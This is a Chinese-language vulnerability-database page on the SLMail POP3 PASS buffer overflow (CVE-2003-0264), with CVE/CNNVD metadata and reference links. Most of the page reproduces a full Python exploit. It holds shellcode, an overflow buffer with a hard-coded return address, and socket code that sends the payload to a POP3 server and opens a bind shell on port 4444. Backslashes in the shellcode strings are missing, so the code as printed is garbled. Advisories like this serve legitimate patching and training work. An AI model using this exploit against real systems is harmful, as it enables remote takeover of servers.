SLMail缓冲区溢出漏洞

SLMail缓冲区溢出漏洞

漏洞ID 1108281 漏洞类型 缓冲区溢出
发布时间 2004-11-18 更新时间 2004-11-18
图片[1]-SLMail缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0264
图片[2]-SLMail缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200305-072
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/638
https://www.securityfocus.com/bid/82841
https://cxsecurity.com/issue/WLB-2021020148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-072
|漏洞详情
SLMail5.1.0.4420版本存在多个缓冲区溢出漏洞。远程攻击者可以通过(1)slmail.exe中的超长EHLO参数,(2)slmail.exe中的超长XTRN参数,(3)POPPASSWD中的超长字符串,或(4)POP3服务器中的超长密码执行任意代码。
|漏洞EXP
#########################################################
#                                                       #
# SLmail 5.5 POP3 PASS Buffer Overflow               	#
# Discovered by : Muts                                  #
# Coded by : Muts                                       #
# www.offsec.com                                        #
# Plain vanilla stack overflow in the PASS command  	#
#                                                       #
#########################################################
# D:ProjectsBO>SLmail-5.5-POP3-PASS.py                #
#########################################################
# D:ProjectsBO>nc -v 192.168.1.167 4444               #
# localhost.lan [192.168.1.167] 4444 (?) open           #   
# Microsoft Windows 2000 [Version 5.00.2195]            #
# (C) Copyright 1985-2000 Microsoft Corp.               #
# C:Program FilesSLmailSystem>                       #
#########################################################

import struct
import socket

print "nn###############################################"
print "nSLmail 5.5 POP3 PASS Buffer Overflow"
print "nFound & coded by muts [at] offsec.com"
print "nFor Educational Purposes Only!" 
print "nn###############################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"

#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = 'x41' * 4654 + struct.pack('<L', 0x783d6ddf) + 'x90'*32 + sc 
try:
	print "nSending evil buffer..."
	s.connect(('192.168.1.167',110))
	data = s.recv(1024)
	s.send('USER username' +'rn')
	data = s.recv(1024)
	s.send('PASS ' + buffer + 'rn')
	data = s.recv(1024)
	s.close()
	print "nDone! Try connecting to port 4444 on victim machine."
except:
	print "Could not connect to POP3!"

# milw0rm.com [2004-11-18]
|受影响的产品
Seattle Lab Software SLMail 5.1.0.4420
|参考资料

来源:www.nextgenss.com
链接:http://www.nextgenss.com/advisories/slmail-vulns.txt
来源:NTBUGTRAQ
名称:20030507MultipleBufferOverflowVulnerabilitiesinSLMail(#NISR07052003A)
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=105233360321895&w;=2
来源:BUGTRAQ
名称:20030507MultipleBufferOverflowVulnerabilitiesinSLMail(#NISR07052003A)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105232506011335&w;=2

相关推荐: Qualcomm Eudora Encrypted EMail Attachment/Image Storage Vulnerability

Qualcomm Eudora Encrypted EMail Attachment/Image Storage Vulnerability 漏洞ID 1099282 漏洞类型 Design Error 发布时间 2003-11-12 更新时间 2003-11…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享